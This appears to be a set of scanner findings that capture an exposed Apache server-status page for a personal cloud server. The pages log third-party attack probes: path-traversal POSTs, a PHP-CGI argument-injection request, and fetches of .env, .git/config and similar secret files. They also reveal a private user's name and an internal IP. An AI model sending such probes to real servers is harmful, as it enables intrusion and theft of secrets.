178.128.207.138http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-32326266790/5/9027_ 0.64109532660.00.041621.96 178.128.207.138h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32326266790/4/7027_ 0.71019726990.00.021161.78 205.210.31.111http/1.1localhost:80GET / HTTP/1.0 1-32326266790/5/7798_ 0.6012899602180.00.031367.31 178.128.207.138h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32326266790/3/7909_ 0.6811689852860.00.041841.37 178.128.207.138h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-32326266790/4/6937_ 0.7112029394750.00.032004.44 4.246.246.216http/1.1ravignon.mycloud.paris:443GET /owa/auth/x.js HTTP/1.1 1-32326266790/3/7346_ 0.45009329820.00.002347.52 185.234.216.100http/1.1 1-32326266790/7/6993_ 0.73112312345760.00.031961.38 178.128.207.138http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-32326266790/5/7971_ 0.790639454230.00.001900.71 178.128.207.138http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-32326266790/4/7055_ 0.57119742620.00.033153.42 178.128.207.138http/1.1 1-32326266790/7/7273_ 0.71029712620.00.033640.49 185.234.216.100http/1.1localhost:80GET / HTTP/1.1 1-32326266790/6/7215_ 0.7901779828080.00.011234.67 178.128.207.138http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-32326266790/6/7022_ 0.55019457240.00.021606.41 47.245.122.65http/1.1 2-321-0/0/2598. 0.0010575203422650.00.0051.55 185.234.216.88http/1.1 2-321-0/0/2564. 0.0010575203600310.00.00195.91 87.236.176.184h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480553638308
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Tuesday, 08-Oct-2024 02:47:08 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 322 Parent Server MPM Generation: 321 Server uptime: 318 days 19 hours 47 minutes 29 seconds Server load: 0.08 0.02 0.01 Total accesses: 558076 - Total Traffic: 62.1 GB - Total Duration: 79412851 CPU Usage: u908.1 s1788.3 cu5995.49 cs1667.79 - .0376% CPU load .0203 requests/sec - 2419 B/second - 116.6 kB/request - 142.298 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 22617829no0yes025000 32617830no0yes124000 Sum200 149000 ..................................................______________ ____________________________W_______............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-318-0/0/5674. 0.0018282608860200.00.00106.33 141.98.11.79http/1.1 0-318-0/0/5613. 0.0018282608230560.00.0083.32 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5723. 0.00182826718622710.00.0094.29 64.226.78.121http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-318-0/0/5635. 0.001828261468539800.00.00101.55 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 0-318-0/0/5716. 0.0018282608747710.00.00105.08 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 0-318-0/0/5767. 0.001828262208777530.00.00123.78 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-318-0/0/5690. 0.001828261998530870.00.0076.03 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 0-318-0/0/5683. 0.00182826858491150.00.0098.84 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-318-0/0/5609. 0.001828261318618920.00.0090.46 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-318-0/0/5708. 0.00182826919061700.00.00173.30 54.78.34.25http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-318-0/0/5688. 0.00182826648517510.00.0079.77 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-318-0/0/5634. 0.001828262318413560.00.0071.55 185.224.128.83http/1.1ravignon.mycloud.paris:443GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-318-0/0/5726. 0.00182826858889670.00.0094.83 54.78.34.25http/1.1 0-318-0/0/5695. 0.00182826608762340.00.0085.17 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-318-0/0/5734. 0.001828261318678440.00.0057.69 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /_all_dbs HTTP/1.1 0-318-0/0/5775. 0.0018282619146050.00.0096.28 141.98.11.79http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5671. 0.0018282628806700.00.00129.74 45.83.64.104http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5615. 0.001828261188630640.00.00116.88 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5666. 0.001828261148364750.00.0090.17 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-318-0/0/5590. 0.00182826608828880.00.0088.81 45.83.64.104http/1.1 0-318-0/0/5610. 0.0018282608342700.00.0065.19 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5617. 0.001828261058756700.00.0070.64 54.78.34.25h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5516. 0.001828262778295990.00.0078.51 45.155.91.30http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-318-0/0/5639. 0.00182826648698440.00.0092.06 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-318-0/0/5634. 0.001828261478741910.00.00116.44 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-318-0/0/8236. 0.0018282609786730.00.001826.31 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-318-0/0/8136. 0.00182826010024240.00.001179.54 64.226.78.121http/1.1 1-318-0/0/7058. 0.001828261369298550.00.001538.98 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /config.json HTTP/1.1 1-318-0/0/7714. 0.0018282649633280.00.001703.06 64.226.78.121http/1.1 1-318-0/0/7096. 0.0018282609783550.00.001290.59 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-318-0/0/9097. 0.00182826679833190.00.001499.44 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-318-0/0/7360. 0.00182826659550340.00.001649.97 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-318-0/0/9551. 0.0018282619680030.00.001823.01 182.180.91.217http/1.1localhost:80GET /info.php HTTP/1.1 1-318-0/0/7585. 0.0018282619475990.00.001350.63 64.226.78.121http/1.1 1-318-0/0/8023. 0.0018282609893350.00.001687.14 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-318-0/0/8096. 0.0018282609348400.00.001955.20 64.226.78.121http/1.1 1-318-0/0/7578. 0.0018282629892770.00.004063.23 57.129.23.166http/1.1 1-318-0/0/7221. 0.001828261829821490.00.002086.64 45.83.64.243http/1.1 1-318-0/0/8973. 0.0018282609514520.00.001621.81 182.180.91.217http/1.1 1-318-0/0/6974. 0.0018282609712890.00.001161.58 182.180.91.217http/1.1 1-318-0/0/7745. 0.0018282619585040.00.001367.12 182.180.91.217http/1.1localhost:80GET /?phpinfo=1 HTTP/1.1 1-318-0/0/7855. 0.0018282619842930.00.001841.19 57.129.23.166http/1.1 1-318-0/0/6874. 0.0018282629380950.00.002004.22 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-318-0/0/7306. 0.0018282609306540.00.002347.40 45.83.64.243http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-318-0/0/6950. 0.00182826112334640.00.001961.25 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-318-0/0/7923. 0.0018282629445510.00.001900.58 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 1-318-0/0/7008. 0.0018282609729260.00.003153.23 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-318-0/0/7209. 0.0018282609695350.00.003640.26 85.209.11.234http/1.1localhost:80\x03 1-318-0/0/7153. 0.0018282609814430.00.001234.51 182.180.91.217http/1.1localhost:80POST /.env.development.local HTTP/1.1 1-318-0/0/6979. 0.0018282629441650.00.001606.19 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 2-32126178290/1/2566_ 0.019750803422560.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48056515aa0e
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 06-Oct-2024 17:09:23 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 320 Parent Server MPM Generation: 319 Server uptime: 317 days 10 hours 9 minutes 43 seconds Server load: 0.00 0.00 0.00 Total accesses: 552517 - Total Traffic: 59.5 GB - Total Duration: 78765434 CPU Usage: u906.87 s1781.19 cu5827.48 cs1629.12 - .037% CPU load .0201 requests/sec - 2330 B/second - 113.0 kB/request - 142.557 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 22609406no0yes025000 32609407no0yes124000 Sum200 149000 ..................................................______________ _________________W__________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-318-0/0/5674. 0.006176008860200.00.00106.33 141.98.11.79http/1.1 0-318-0/0/5613. 0.006176008230560.00.0083.32 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5723. 0.0061760718622710.00.0094.29 64.226.78.121http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-318-0/0/5635. 0.00617601468539800.00.00101.55 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 0-318-0/0/5716. 0.006176008747710.00.00105.08 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 0-318-0/0/5767. 0.00617602208777530.00.00123.78 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-318-0/0/5690. 0.00617601998530870.00.0076.03 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 0-318-0/0/5683. 0.0061760858491150.00.0098.84 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-318-0/0/5609. 0.00617601318618920.00.0090.46 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-318-0/0/5708. 0.0061760919061700.00.00173.30 54.78.34.25http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-318-0/0/5688. 0.0061760648517510.00.0079.77 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-318-0/0/5634. 0.00617602318413560.00.0071.55 185.224.128.83http/1.1ravignon.mycloud.paris:443GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-318-0/0/5726. 0.0061760858889670.00.0094.83 54.78.34.25http/1.1 0-318-0/0/5695. 0.0061760608762340.00.0085.17 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-318-0/0/5734. 0.00617601318678440.00.0057.69 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /_all_dbs HTTP/1.1 0-318-0/0/5775. 0.006176019146050.00.0096.28 141.98.11.79http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5671. 0.006176028806700.00.00129.74 45.83.64.104http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5615. 0.00617601188630640.00.00116.88 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5666. 0.00617601148364750.00.0090.17 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-318-0/0/5590. 0.0061760608828880.00.0088.81 45.83.64.104http/1.1 0-318-0/0/5610. 0.006176008342700.00.0065.19 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5617. 0.00617601058756700.00.0070.64 54.78.34.25h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5516. 0.00617602778295990.00.0078.51 45.155.91.30http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-318-0/0/5639. 0.0061760648698440.00.0092.06 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-318-0/0/5634. 0.00617601478741910.00.00116.44 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-318-0/0/8236. 0.006176009786730.00.001826.31 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-318-0/0/8136. 0.0061760010024240.00.001179.54 64.226.78.121http/1.1 1-318-0/0/7058. 0.00617601369298550.00.001538.98 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /config.json HTTP/1.1 1-318-0/0/7714. 0.006176049633280.00.001703.06 64.226.78.121http/1.1 1-318-0/0/7096. 0.006176009783550.00.001290.59 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-318-0/0/9097. 0.0061760679833190.00.001499.44 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-318-0/0/7360. 0.0061760659550340.00.001649.97 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-318-0/0/9551. 0.006176019680030.00.001823.01 182.180.91.217http/1.1localhost:80GET /info.php HTTP/1.1 1-318-0/0/7585. 0.006176019475990.00.001350.63 64.226.78.121http/1.1 1-318-0/0/8023. 0.006176009893350.00.001687.14 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-318-0/0/8096. 0.006176009348400.00.001955.20 64.226.78.121http/1.1 1-318-0/0/7578. 0.006176029892770.00.004063.23 57.129.23.166http/1.1 1-318-0/0/7221. 0.00617601829821490.00.002086.64 45.83.64.243http/1.1 1-318-0/0/8973. 0.006176009514520.00.001621.81 182.180.91.217http/1.1 1-318-0/0/6974. 0.006176009712890.00.001161.58 182.180.91.217http/1.1 1-318-0/0/7745. 0.006176019585040.00.001367.12 182.180.91.217http/1.1localhost:80GET /?phpinfo=1 HTTP/1.1 1-318-0/0/7855. 0.006176019842930.00.001841.19 57.129.23.166http/1.1 1-318-0/0/6874. 0.006176029380950.00.002004.22 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-318-0/0/7306. 0.006176009306540.00.002347.40 45.83.64.243http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-318-0/0/6950. 0.0061760112334640.00.001961.25 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-318-0/0/7923. 0.006176029445510.00.001900.58 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 1-318-0/0/7008. 0.006176009729260.00.003153.23 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-318-0/0/7209. 0.006176009695350.00.003640.26 85.209.11.234http/1.1localhost:80\x03 1-318-0/0/7153. 0.006176009814430.00.001234.51 182.180.91.217http/1.1localhost:80POST /.env.development.local HTTP/1.1 1-318-0/0/6979. 0.006176029441650.00.001606.19 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 2-31926094060/2/2476_ 0.43797823357550.00.0125.23 144.126.231.206
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48059999f68a
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 04-Oct-2024 16:57:44 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 318 Parent Server MPM Generation: 317 Server uptime: 315 days 9 hours 58 minutes 4 seconds Server load: 0.00 0.00 0.00 Total accesses: 550771 - Total Traffic: 59.5 GB - Total Duration: 78640561 CPU Usage: u911.6 s1773.23 cu5807.36 cs1622.64 - .0371% CPU load .0202 requests/sec - 2343 B/second - 113.2 kB/request - 142.783 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02600973no0yes025000 12600972no0yes124000 Sum200 149000 ___________________________________W______________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31726009730/22/5643_ 7.4617113278840220.00.18106.11 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31726009730/30/5585_ 8.0821868214100.00.2083.20 138.197.191.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-31726009730/20/5698_ 8.1020513038608080.00.2194.18 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/21/5611_ 7.8021388492590.00.13101.38 138.197.191.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-31726009730/26/5686_ 8.071091848719810.00.19104.91 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31726009730/19/5736_ 7.7018928752850.00.10123.55 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31726009730/32/5664_ 8.1020513558499050.00.4975.88 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31726009730/25/5651_ 7.961091058470680.00.1698.62 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31726009730/22/5572_ 8.1020512878573910.00.1590.12 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31726009730/26/5681_ 7.942001789033920.00.94173.02 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31726009730/26/5662_ 7.902001758477060.00.2279.60 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/22/5603_ 7.941711988386220.00.6571.41 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/22/5698_ 8.11176718869790.00.9294.69 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/22/5669_ 7.851411008746230.00.1885.01 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/23/5709_ 8.111461148667270.01.3757.56 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/19/5747_ 7.771412059128690.00.1296.08 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31726009730/23/5638_ 8.131141988786600.00.17129.58 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/34/5594_ 8.121162778604820.00.23116.71 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31726009730/26/5637_ 7.8021688351800.00.1890.00 138.197.191.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-31726009730/22/5557_ 8.0821788810380.00.1588.60 138.197.191.87http/1.1 0-31726009730/25/5588_ 8.1711288311690.00.1665.08 138.197.191.87http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-31726009730/23/5592_ 7.7520012958725840.03.0970.45 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31726009730/20/5485_ 7.03200808247070.02.7278.27 185.117.37.101http/1.1 0-31726009730/20/5609_ 7.64200738673920.00.1391.86 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31726009730/23/5606_ 8.022001918715250.03.08116.30 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31726009720/48/8215_ 9.2911639777500.00.301826.26 138.197.191.87http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-31726009720/46/8103_ 9.22012110014770.00.301179.45 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31726009720/38/7035_ 9.2222299295020.00.281538.92 138.197.191.87http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-31726009720/42/7680_ 9.13211229621590.00.301702.93 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-31726009720/49/7071_ 8.74211319774600.00.481290.50 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-31726009720/47/9072_ 9.1822259829080.00.351499.34 138.197.191.87http/1.1 1-31726009720/39/7331_ 9.13211439537500.01.421649.62 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-31726009720/48/9532_ 9.0721629666020.00.271822.96 138.197.191.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31726009720/43/7565_ 8.93211709470050.00.381350.58 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31726009720/53/7999_ 9.04219887130.00.791687.08 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-31726009721/51/8068W 9.12009331580.00.331954.96 138.197.191.87http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-31726009720/41/7551_ 9.0721889869290.00.304053.09 138.197.191.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31726009720/43/7198_ 9.3101559796700.00.252086.53 138.197.191.87http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-31726009720/46/8944_ 9.0911659508530.00.301621.68 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31726009720/38/6943_ 9.1901079702390.00.301153.86 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31726009720/45/7716_ 9.3001789561120.01.441361.02 138.197.191.87http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-31726009720/45/7830_ 8.6211109836120.00.381839.46 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-31726009720/50/6855_ 9.3201019375930.00.302001.13 138.197.191.87http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-31726009720/43/7279_ 9.2101189273320.00.302344.38 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805eb7ca189
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 02-Oct-2024 16:27:58 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 316 Parent Server MPM Generation: 315 Server uptime: 313 days 9 hours 28 minutes 19 seconds Server load: 0.08 0.02 0.01 Total accesses: 546693 - Total Traffic: 59.4 GB - Total Duration: 77779866 CPU Usage: u907.21 s1762.29 cu5775.21 cs1612.95 - .0371% CPU load .0202 requests/sec - 2356 B/second - 114.0 kB/request - 142.273 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12592355no0yes025000 32592356no0yes124000 Sum200 149000 ........................._________________________.............. ...........__W______________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-308-0/0/5618. 0.0057767518797400.00.00105.89 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5553. 0.0057767518124310.00.0082.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5676. 0.005776751278564840.00.0093.96 35.203.210.62http/1.1 0-308-0/0/5588. 0.0057767508439410.00.00101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5656. 0.005776752428672090.00.00104.66 91.92.249.4http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-308-0/0/5714. 0.005776752208721810.00.00123.40 3.83.204.156http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5630. 0.005776751318425130.00.0075.35 35.203.210.62http/1.1 0-308-0/0/5623. 0.005776751848431820.00.0098.44 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5547. 0.005776751338528040.00.0089.94 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-308-0/0/5651. 0.005776751448971070.00.00172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-308-0/0/5635. 0.0057767518393120.00.0079.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-308-0/0/5578. 0.005776752698341260.00.0070.74 67.70.237.204http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-308-0/0/5674. 0.0057767518811050.00.0093.75 54.236.215.155http/1.1 0-308-0/0/5646. 0.005776752278704220.00.0084.83 54.236.215.155http/1.1 0-308-0/0/5683. 0.0057767558636820.00.0056.19 172.206.140.226http/1.1 0-308-0/0/5726. 0.0057767509103570.00.0095.94 106.75.156.189http/1.1ravignon.mycloud.paris:443{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\", 0-308-0/0/5612. 0.0057767518748030.00.00129.38 35.203.210.62http/1.1 0-308-0/0/5557. 0.0057767508549690.00.00116.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-308-0/0/5605. 0.005776751448316590.00.0089.75 35.203.210.62http/1.1 0-308-0/0/5532. 0.0057767518758800.00.0088.43 54.236.215.155http/1.1 0-308-0/0/5560. 0.0057767518268650.00.0064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-308-0/0/5565. 0.0057767538632920.00.0067.35 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5461. 0.0057767518208060.00.0075.51 54.236.215.155http/1.1 0-308-0/0/5587. 0.0057767538638990.00.0091.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5582. 0.005776751658645010.00.00113.21 178.238.238.29http/1.1localhost:80GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 1-31525923550/33/8094_ 7.602829530830.00.231825.41 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31525923550/33/8002_ 